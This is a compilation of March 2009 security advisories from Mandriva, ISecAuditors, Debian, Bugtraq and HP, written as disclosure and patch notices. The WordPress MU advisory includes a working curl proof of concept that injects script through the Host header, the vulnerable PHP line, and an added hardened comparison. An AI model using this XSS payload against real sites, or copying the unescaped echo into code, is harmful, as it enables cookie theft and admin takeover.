 a81c832fddc48d688213bc82cd9380df  2009.0/i586/qc-usb-kernel-2.6.27.19-desktop586-1mnb-0.6.6-6mdv2009.0.i586.rpm
 c8b8bbb68fdfb8d62a4f959337b69060  2009.0/i586/qc-usb-kernel-2.6.27.19-server-1mnb-0.6.6-6mdv2009.0.i586.rpm
 b1dd4c309c852d61432f608684417174  2009.0/i586/qc-usb-kernel-desktop586-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
 45f7b32bc8ca152e3591b370453903f9  2009.0/i586/qc-usb-kernel-desktop-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
 63ab7b8e15acfafec986fc3329fd4ace  2009.0/i586/qc-usb-kernel-server-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
 8857d93572e771cf61f74b3e7314847f  2009.0/i586/rt2860-kernel-2.6.27.19-desktop-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 dc1b1f29dcc9c4dbe9fd6eb7784f18e1  2009.0/i586/rt2860-kernel-2.6.27.19-desktop586-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 31ab07fe76c636721d98650788c6636a  2009.0/i586/rt2860-kernel-2.6.27.19-server-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 4cdf540e3c9fb2001e369cc6353c56e6  2009.0/i586/rt2860-kernel-desktop586-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
 ebc20fa97dcb178adcc7a6da546c0f63  2009.0/i586/rt2860-kernel-desktop-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
 ff9ea4777a7d4052ad2da48d71538220  2009.0/i586/rt2860-kernel-server-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
 9734b47a2dec3510e7851d972da5ee88  2009.0/i586/rt2870-kernel-2.6.27.19-desktop-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 e588805d6198a9c1eac96d09b317fd2b  2009.0/i586/rt2870-kernel-2.6.27.19-desktop586-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 167cddba9d97c655184c7d79b9383ca4  2009.0/i586/rt2870-kernel-2.6.27.19-server-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 f5bfe516a51433cfaab9d766ae209430  2009.0/i586/rt2870-kernel-desktop586-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
 a7785d9be7e07cc9e5d2f4445bffd822  2009.0/i586/rt2870-kernel-desktop-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
 a962d5a5ddb0d5abfbe1fe3e57fb48b1  2009.0/i586/rt2870-kernel-server-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
 b1a877d9e8d00b70b59bb80c9680acbe  2009.0/i586/rtl8187se-kernel-2.6.27.19-desktop-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 c048e5315987f26780616cf94c0f4822  2009.0/i586/rtl8187se-kernel-2.6.27.19-desktop586-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 f6eff0adb94357152e3a0852d5379ad3  2009.0/i586/rtl8187se-kernel-2.6.27.19-server-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 a32f1a756d4de813795e599e97d1c2d0  2009.0/i586/rtl8187se-kernel-desktop586-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
 2ff2126b46e5f25885d405fa5127111e  2009.0/i586/rtl8187se-kernel-desktop-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
 9662cf974be2c1a44c37b6190f3dc5fa  2009.0/i586/rtl8187se-kernel-server-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
 f23c60919bb5868d827154d0d124b24b  2009.0/i586/slmodem-kernel-2.6.27.19-desktop-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 f174511adbf4e7d4a28fa93d8bf445df  2009.0/i586/slmodem-kernel-2.6.27.19-desktop586-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 98e226637b496a13a5cc61aa1c32825e  2009.0/i586/slmodem-kernel-2.6.27.19-server-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 2453d695bf412200f05105d19c83295d  2009.0/i586/slmodem-kernel-desktop586-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
 81ba97857beb20d566b38b4eb70395f3  2009.0/i586/slmodem-kernel-desktop-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
 fde7a43ea7bec1b5bd0ed4ee2d44649a  2009.0/i586/slmodem-kernel-server-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
 052bec59e98e44029488c57b69fe60ff  2009.0/i586/squashfs-lzma-kernel-2.6.27.19-desktop-1mnb-3.3-5mdv2009.0.i586.rpm
 4c1fa95cc898ba83f6baf0d620edd03b  2009.0/i586/squashfs-lzma-kernel-2.6.27.19-desktop586-1mnb-3.3-5mdv2009.0.i586.rpm
 c2fb9bcc23ff1f6f5cc80f141bfcc5b5  2009.0/i586/squashfs-lzma-kernel-2.6.27.19-server-1mnb-3.3-5mdv2009.0.i586.rpm
 ffaee2e16f52219fd01aeac53a7b9a28  2009.0/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
 875ef4776e87aacc60311cd6348c8e70  2009.0/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
 7be80c25c340e40ab5806cbb7e2b1c1b  2009.0/i586/squashfs-lzma-kernel-server-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
 67d811b775b455cca7646ab96fe19feb  2009.0/i586/tp_smapi-kernel-2.6.27.19-desktop-1mnb-0.37-2mdv2009.0.i586.rpm
 dc86190987f5d63dee6a09f6b575cc03  2009.0/i586/tp_smapi-kernel-2.6.27.19-desktop586-1mnb-0.37-2mdv2009.0.i586.rpm
 b5541df9b49246ab3a543954776b0c45  2009.0/i586/tp_smapi-kernel-2.6.27.19-server-1mnb-0.37-2mdv2009.0.i586.rpm
 08c55424da589b16df3d121444567561  2009.0/i586/tp_smapi-kernel-desktop586-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
 42b2b4fcb45a531cf9ac98415df13a75  2009.0/i586/tp_smapi-kernel-desktop-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
 25cc601d14b45a48684a637293bce938  2009.0/i586/tp_smapi-kernel-server-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
 17fef41a38010861a901930cf4ed8789  2009.0/i586/vboxadd-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 5b4a7708d4886312877f1221ff8b8e6a  2009.0/i586/vboxadd-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 fbb5b5ffd33de16d821f38f860aeaee3  2009.0/i586/vboxadd-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 a74d862b1eab86f4e91750b6a6d17d36  2009.0/i586/vboxadd-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 05cb9e7b2412e33b527a9d8349801d39  2009.0/i586/vboxadd-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 b0b7f400718e23692fad06655ead2d5b  2009.0/i586/vboxadd-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 5f4036eea31ec44aee2c39ce9fd1e019  2009.0/i586/vboxvfs-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 402e81c8f408dd6cf76069163e5005b5  2009.0/i586/vboxvfs-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 d46a98e24e9eade0625ac0ddc824b21e  2009.0/i586/vboxvfs-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 f3cb5d805d8a5787e2ca57f28eb52529  2009.0/i586/vboxvfs-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 e2b5b411390ed737e4fcebbc364b5a4f  2009.0/i586/vboxvfs-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 cbd8cd9d0405eac1939629533ef8fe02  2009.0/i586/vboxvfs-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 34d17ced32a45f67e7f85185c3b2a7bb  2009.0/i586/vhba-kernel-2.6.27.19-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 8cd923691e9c04811a1d2eafa32fa091  2009.0/i586/vhba-kernel-2.6.27.19-desktop586-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 d6b8d565712b513d4e31ce08411c3cc9  2009.0/i586/vhba-kernel-2.6.27.19-server-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 fb6c3b61defffb731bd8143e8ea56efe  2009.0/i586/vhba-kernel-desktop586-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
 b2505d5bb99c5889a12e2e089e549669  2009.0/i586/vhba-kernel-desktop-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
 1207949eafe27831fdd8695ea118ddfe  2009.0/i586/vhba-kernel-server-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
 13af97bb172b5647d388dea63f7afdeb  2009.0/i586/virtualbox-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 242b990d08b0795552e3ded15091ca9a  2009.0/i586/virtualbox-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 4498313356e483be80ae72ba8a06f4aa  2009.0/i586/virtualbox-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 6572f7084ab8fa7ce55dc23137e539eb  2009.0/i586/virtualbox-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 4b5c0c2b8dc899fb686021271ba6361a  2009.0/i586/virtualbox-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 2d3a307b25fe2cef9cd6ea1a459c29d2  2009.0/i586/virtualbox-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 1e54fb41c4c6723108369e9b34233038  2009.0/i586/vpnclient-kernel-2.6.27.19-desktop-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 fe82daedce3d043ad3076c760a6b45e7  2009.0/i586/vpnclient-kernel-2.6.27.19-desktop586-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 872dd1a1024376324b12de05b84b2dfd  2009.0/i586/vpnclient-kernel-2.6.27.19-server-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 98ec90796498ee16c43c2e16d5f52640  2009.0/i586/vpnclient-kernel-desktop586-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
 6fa03085ae3c3e7b7472131f4f6b7254  2009.0/i586/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
 828088821547485bfb7cfc52e05763a3  2009.0/i586/vpnclient-kernel-server-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm 
 9449cc7da776f4b2a5f72e386f555cbc  2009.0/SRPMS/kernel-2.6.27.19-1mnb2.src.rpm

 Mandriva Linux 2009.0/X86_64:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

Message-ID: <49B6CD06.10201@isecauditors.com>
Date: Tue, 10 Mar 2009 21:26:46 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Organization: Internet Security Auditors
To: bugs@securitytracker.com, news@securiteam.com,
full-disclosure@lists.grok.org.uk, vuln@secunia.com,
packet@packetstormsecurity.org, bugtraq@securityfocus.com
Subject: [ISecAuditors Security Advisories] WordPress MU HTTP Header XSS Vulnerability

============================================
INTERNET SECURITY AUDITORS ALERT 2009-004
- Original release date: December 3rd, 2008
- Last revised:  March 10th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.3/10 (CVSS scored)
============================================
I. VULNERABILITY
-------------------------
WordPress MU < 2.7 'Host' HTTP Header Cross Site Scripting (XSS)
Vulnerability

II. BACKGROUND
-------------------------
WordPress MU, or multi-user, allows running unlimited blogs with a
single install of WordPress. It is most famously used for
WordPress.com, where it serves tens of millions of hits on hundreds of
thousands of blogs each day. It is also used on many other sites, such as
Harvard University and Le Monde.

III. DESCRIPTION
-------------------------
WordPress MU prior to version 2.7 fails to sanitize the Host header
correctly in the choose_primary_blog function and is therefore prone to
XSS attacks.
Web sites running in a name-based virtual hosting setup are not
affected as long as they are not the default virtual host.

IV. PROOF OF CONCEPT
-------------------------
The snippet of vulnerable code:

In wp-includes/wpmu-functions.php, specifically in the function
choose_primary_blog:

1830 function choose_primary_blog() {
1831     global $current_user;
1832     ?>
1833     <table class="form-table">
1834     <tr>
1835         <th scope="row"><?php _e('Primary Blog'); ?></th>
1836         <td>
1837         <?php
1838         $all_blogs = get_blogs_of_user( $current_user->ID );
1839         if( count( $all_blogs ) > 1 ) {
1840             $primary_blog = get_usermeta($current_user->ID, 'primary_blog');
1841             ?>
1842             <select name="primary_blog">
1843                 <?php foreach( (array) $all_blogs as $blog ) { ?>
1844                     <option value='<?php echo $blog->userblog_id ?>'<?php if( $primary_blog == $blog->userblog_id ) echo ' selected="selected"' ?>>http://<?php echo $blog->domain.$blog->path ?></option>
1845                 <?php } ?>
1846             </select>
1847             <?php
1848         } else {
1849             echo $_SERVER['HTTP_HOST']; <- HERE
1850         }
1851         ?>
1852         </td>
1853     </tr>
1854     </table>
1855     <?php
1856 }

Line 1849 contains the affected code "echo $_SERVER['HTTP_HOST'];"
and it is possible to inject HTML and script code by crafting the HTTP
Host header:

PoC:
$ curl -H "Cookie: my cookies here" -H "Host: <body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.com/wp-admin/profile.php > tmp.html
$ firefox tmp.html

The JavaScript code will be executed in the context of the victim's
browser; this can be exploited to steal cookies and escalate
privileges to administrator.

Tested with Wordpress MU 2.6.5, Apache 2.2 and Mozilla Firefox 3.0.6

V. BUSINESS IMPACT
-------------------------
The impact is that the attacker can gain administrator privileges on the
application.

VI. SYSTEMS AFFECTED
-------------------------
Versions prior to 2.7 are affected

VII. SOLUTION
-------------------------
Upgrade to version 2.7 of wordpress multi-user. It can be downloaded
from http://mu.wordpress.org

VIII. REFERENCES
-------------------------
http://mu.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
December  03, 2008: Initial release
March     02, 2009: More details added

XI. DISCLOSURE TIMELINE
-------------------------
December  03, 2008: Vendor contacted
December  03, 2008: MU trunk code fixed
January   28, 2008: WordPress MU 2.7 released
March     10, 2009: Vulnerability published by
                    Internet Security Auditors (www.isecauditors.com)

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
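
Added example (not part of the advisory and not WordPress MU's own code): the
line 1849 pattern next to a hardened form that validates the Host header
against the names the install serves and then encodes it for HTML output. The
function names, the allowlist and the sample Host values are constructed for
illustration; the last sample is the header value from the advisory's PoC.

```php
<?php
// Added example, not WordPress MU code. Function names, the allowlist and
// the sample Host values are assumptions made for this illustration.

/** Mirrors the behaviour of line 1849: the header is emitted verbatim. */
function primary_blog_cell_vulnerable(array $server): string
{
    return '<td>' . $server['HTTP_HOST'] . '</td>';
}

/**
 * Return the request host only if it is syntactically a hostname
 * (optionally followed by a port) and is one of the names this install
 * serves. Anything else falls back to the configured canonical name, which
 * is what a non-default name-based virtual host gets from the web server.
 */
function trusted_host(array $server, array $allowed, string $canonical): string
{
    $raw = isset($server['HTTP_HOST']) ? (string) $server['HTTP_HOST'] : '';
    // Letters, digits, dots and hyphens, then an optional :port.
    // \z (not $) so a trailing newline cannot slip through.
    $pattern = '/^([a-z0-9](?:[a-z0-9.-]{0,251}[a-z0-9])?)(?::(\d{1,5}))?\z/i';
    if (!preg_match($pattern, $raw, $m)) {
        return $canonical;
    }
    $name = strtolower($m[1]);
    return in_array($name, $allowed, true) ? $name : $canonical;
}

/** Hardened cell: validated host, then encoded for the HTML text context. */
function primary_blog_cell_hardened(array $server, array $allowed, string $canonical): string
{
    $host = trusted_host($server, $allowed, $canonical);
    return '<td>' . htmlspecialchars($host, ENT_QUOTES, 'UTF-8') . '</td>';
}

// Constructed configuration and inputs.
$allowed   = ['blogs.example.com', 'www.example.com'];
$canonical = 'blogs.example.com';
$samples   = [
    'www.example.com',                                     // served name
    'WWW.EXAMPLE.COM:8080',                                // case and port variant
    'evil.example.net',                                    // valid syntax, not served
    '<body onload=alert(String.fromCharCode(88,83,83))>',  // value from the advisory's PoC
];

foreach ($samples as $host) {
    $server = ['HTTP_HOST' => $host];
    $unsafe = primary_blog_cell_vulnerable($server);
    $safe   = primary_blog_cell_hardened($server, $allowed, $canonical);

    // The hardened cell must never carry markup from the header.
    if (strpos($safe, '<body') !== false) {
        throw new RuntimeException('markup survived hardening');
    }
    printf("Host: %s\n  vulnerable: %s\n  hardened:   %s\n", $host, $unsafe, $safe);
}
```

Encoding alone already neutralises the injected markup; the allowlist additionally
stops an arbitrary but well-formed Host value from being shown as the blog's address.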

From: Florian Weimer <fw@deneb.enyo.de>
Date: Tue, 10 Mar 2009 21:23:49 +0100
Message-ID: <87eix5ktyi.fsf@mid.deneb.enyo.de>
Subject: [SECURITY] [DSA 1735-1] New znc packages fix privilege escalation

------------------------------------------------------------------------
Debian Security Advisory DSA-1735-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
March 10, 2009                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : znc
Vulnerability  : missing input sanitization
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-0759
Debian Bug     : 516950

It was discovered that znc, an IRC proxy/bouncer, does not properly
sanitize input contained in configuration change requests to the
webadmin interface.  This allows authenticated users to elevate their
privileges and indirectly execute arbitrary commands (CVE-2009-0759).

For the old stable distribution (etch), this problem has been fixed in
version 0.045-3+etch2.

For the stable distribution (lenny), this problem has been fixed in
version 0.058-2+lenny1.

For the unstable distribution (sid), this problem has been fixed in
version 0.066-1.

We recommend that you upgrade your znc packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045.orig.tar.gz
    Size/MD5 checksum:   204863 9a514b125b7514811fd03befa73cce77
  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2.dsc
    Size/MD5 checksum:      962 1962af4c56b4c4c169832249d6b99f30
  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2.diff.gz
    Size/MD5 checksum:    12817 c254e989604122fb7267a0fafeddfd95

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_alpha.deb
    Size/MD5 checksum:   859792 f154f471d3b0d42d7b7cfe8eebaf3134

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_amd64.deb
    Size/MD5 checksum:   793694 80c9126c518abe062265cee5d94ca6f1

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_hppa.deb
    Size/MD5 checksum:   857356 04a64d64b5a4582fcd7db3bef32822ec

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_i386.deb
    Size/MD5 checksum:   806592 99b63e880bbba2841f30ed006fbe2364

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_ia64.deb
    Size/MD5 checksum:   957620 061cfe882476dc4ad55caf16ec8c7af8

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_mips.deb
    Size/MD5 checksum:   713450 625f8ed77be76269bd78f4414ed55a61

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_mipsel.deb
    Size/MD5 checksum:   710332 5b07981be622bf78839d2376af142e3d

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_powerpc.deb
    Size/MD5 checksum:   789838 5c75fc8a345a20c6b6e39e2eb97cd004

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_s390.deb
    Size/MD5 checksum:   730066 514965b8fa4913d2e1ff13630bd5957a

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_sparc.deb
    Size/MD5 checksum:   747502 6b72758d93bb4ddc392ef6cfa119a5c2


Debian GNU/Linux 4.0 alias lenny
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1.dsc
    Size/MD5 checksum:     1332 c657b80b61750fc072ce257c1d682b21
  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1.diff.gz
    Size/MD5 checksum:     8253 04053487dbf0b49da04ded749d1c384e
  http://security.debian.org/pool/updates/main/z/znc/znc_0.058.orig.tar.gz
    Size/MD5 checksum:   340741 c02fd740c55d5b3a7912f7584344103e

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_alpha.deb
    Size/MD5 checksum:  1096362 92f9a65cd06d7da250f79a3d11e0a124

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_amd64.deb
    Size/MD5 checksum:  1028438 f2058b3d07a9233cef8f9ca0dfec6673

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_arm.deb
    Size/MD5 checksum:  1149682 3ed9f92e4ca7ee29ff3c60897cc71c21

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_hppa.deb
    Size/MD5 checksum:  1163022 359b9459a44f3653e2571cda2fb51085

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_i386.deb
    Size/MD5 checksum:  1013106 15b468bd87a584a0415584452d26ab38

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_ia64.deb
    Size/MD5 checksum:  1181082 f86b365aa064e782ea72a82d216edd62

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_mips.deb
    Size/MD5 checksum:   916040 f6c21df1590da49c335bc76860e5af8d

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_mipsel.deb
    Size/MD5 checksum:   906310 d156e11c8c0bedb5dd56fcfcf40730e9

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_powerpc.deb
    Size/MD5 checksum:  1034324 29a41349db3b895e1a6bdf0bdf249ff8

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_s390.deb
    Size/MD5 checksum:   970792 b0f4f9f9b0e38309fca19dabe60beef4

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_sparc.deb
    Size/MD5 checksum:  1000006 ea9cd30f00b2f9466dfeb84e96198099


  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

Date: Tue, 10 Mar 2009 15:16:51 -0600
Message-Id: <200903102116.n2ALGpka023556@www5.securityfocus.com>
From: sosoblood@hotmail.com
To: bugtraq@securityfocus.com
Subject: Sun Java System Communications Express [HTML Injection]

Hello,

I have found an HTML Injection vulnerability in Sun Java System Communications Express, a web client that provides an integrated web-based communication and collaboration client to the Sun Java Communications Suite. It consists of three client modules - Calendar, Address Book, and Mail.

Here is a screen-shot that demonstrates the vulnerability:
http://sosoblood.freehostia.com/SJSC/html_injection.gif

As we can see in the picture, I was able to inject some HTML and make my name in bold at the header of the page. Also, I was able to inject an image in the test message subject that I sent to myself.
One can also inject an IFRAME or any HTML tag.

However, the potential threat is limited by the limited character size of some fields like the "Full Name" at the header of the page and the "Subject" of a message. So injecting long strings is impossible.

A solution for this vulnerability is implemented by using the htmlentities() function.

Thank you for reading.

Edgard Chammas [454447415244].

Date: Tue, 10 Mar 2009 21:33:38 +0100
From: Steffen Joeris <white@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090310203338.GA5090@galadriel.inutil.org>
Subject: [SECURITY] [DSA 1736-1] New mahara packages fix cross-site scripting

------------------------------------------------------------------------
Debian Security Advisory DSA-1736-1                  security@debian.org
http://www.debian.org/security/                           Steffen Joeris
March 10, 2009                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : mahara
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2009-0660

It was discovered that mahara, an electronic portfolio, weblog, and
resume builder, is prone to cross-site scripting attacks, which allows
the injection of arbitrary Java or HTML code.

For the stable distribution (lenny), this problem has been fixed in
version 1.0.4-4+lenny1.

The oldstable distribution (etch) does not contain mahara.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem will be fixed soon.


We recommend that you upgrade your mahara package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
--------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1.dsc
    Size/MD5 checksum:     1303 e78e2f84879067ead786f022b3fb9e65
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1.diff.gz
    Size/MD5 checksum:    38565 dab9ae59c86acc880749118e0c7fab20
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4.orig.tar.gz
    Size/MD5 checksum:  2383079 cf1158e4fe3cdba14fb1b71657bf8cc9

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1_all.deb
    Size/MD5 checksum:  1636658 52d68deb52604b9d5ae0ad910ef0ef78
  http://security.debian.org/pool/updates/main/m/mahara/mahara-apache2_1.0.4-4+lenny1_all.deb
    Size/MD5 checksum:     7778 9b1ddde46afd38972b0789e0c18e740a

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>


To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBUX02411 SSRT080111 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code and Other Vulnerabilities
Date: Wed, 11 Mar 2009 08:20:52 -0700
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090311152052.841D7BF7E@hpchs.cup.hp.com>

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01683026
Version: 1

HPSBUX02411 SSRT080111 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code and Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-03-09
Last Updated: 2009-03-09

Potential Security Impact: Multiple remote vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities may allow remote unauthorized access, privilege escalation, execution of arbitrary code, and creation of a Denial of Service (DoS).

References: SUNALERT ID: 244988 (CVE-2008-2086, CVE-2008-5339, CVE-2008-5340, CVE-2008-5341, CVE-2008-5342, CVE-2008-5343, CVE-2008-5344), 246387 (CVE-2008-5345), 246366 (CVE-2008-5347), 246346 (CVE-2008-5348), 246266 (CVE-2008-5350), 245246 (CVE-2008-5351), 244991 (CVE-2008-5353), 244990 (CVE-2008-5354), 244987 (CVE-2008-5356, CVE-2008-5357, CVE-2008-5358, CVE-2008-5359), 244986 (CVE-2008-5360)

